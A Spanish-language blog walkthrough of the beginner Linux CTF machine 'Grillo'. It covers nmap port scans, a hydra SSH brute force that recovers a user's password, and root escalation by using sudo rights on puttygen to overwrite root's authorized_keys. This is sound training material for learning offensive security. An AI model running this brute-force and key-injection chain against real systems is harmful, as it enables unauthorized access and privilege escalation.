# TheHackerLabs - Principiante : [Grillo]

2 min read
writeup-THL
Table of Contents

📛 Nombre: Grillo | 📈 Dificultad: Principiante | 💻 SO: Linux | 👨‍💻 Creador: CuriosidadesDeHackers y Condor

🕵️ Resolución del CTF Grillo

Introducción

Hoy exploraremos la máquina CTF Grillo, diseñada para introducirnos al mundo del hacking ético y la resolución de retos.

  • Nivel de Dificultad: Principiante.
  • Creadores: CuriosidadesDeHackers y Condor.
  • Más detalles en The Hacker’s Labs.
  • Sistema Operativo: Linux.

Información Inicial

Descargamos la máquina y la configuramos en VirtualBox.
La IP asignada es 192.168.10.129.

VirtualBox CTF Grillo

Realizamos un escaneo completo para identificar puertos abiertos:

Terminal window
sudo nmap -p- --open -sS --min-rate 5000 -vvv 192.168.10.129 -oG grillo

Resultados:

Terminal window
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

A continuación, ejecutamos un escaneo detallado:

Terminal window
sudo nmap -p22,80 -sCV 192.168.10.129 -oG grillo-ports

Resultados detallados:

Terminal window
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.57 ((Debian))

Análisis Inicial

Accedemos al puerto 80 y encontramos una página estándar de Apache2 Debian. En el pie de página, un comentario revela un posible nombre de usuario: melanie.

Comentario revelador

Fuerza Bruta en SSH

Con el usuario melanie, realizamos un ataque de fuerza bruta para descubrir su contraseña usando hydra:

Terminal window
hydra -l melanie -P /usr/share/wordlists/rockyou.txt ssh://192.168.10.129

Resultados:

Terminal window
[22][ssh] host: 192.168.10.129 login: melanie password: trustno1

Acceso Inicial: Usuario melanie

Nos conectamos al servidor con las credenciales obtenidas:

Terminal window
ssh melanie@192.168.10.129

Exploramos su directorio personal y encontramos la primera flag:

Terminal window
melanie@grillo:~$ ls
user.txt

¡Primera flag conseguida!


Escalada de Privilegios

Revisamos los privilegios sudo del usuario melanie:

Terminal window
sudo -l

Resultados:

Terminal window
User melanie may run the following commands on grillo:
(root) NOPASSWD: /usr/bin/puttygen

Utilizamos puttygen para generar una clave privada RSA:

Terminal window
puttygen -t rsa -o id_rsa -O private-openssh

Ajustamos los permisos de la clave privada:

Terminal window
chmod 600 id_rsa

Preparamos la clave pública y la añadimos al archivo authorized_keys de root:

Terminal window
sudo /usr/bin/puttygen id_rsa -o /root/.ssh/authorized_keys -O public-openssh

Finalmente, nos conectamos como root usando la clave generada:

Terminal window
ssh -i id_rsa root@192.168.10.129
root@grillo:~#
root@grillo:~# ls
root.txt

Conclusión

Tras obtener acceso root, encontramos la segunda flag en el directorio /root. ¡Reto completado!

My avatar

Thanks for reading my blog post! Feel free to check out my other posts or contact me via the social links in the footer.


More Posts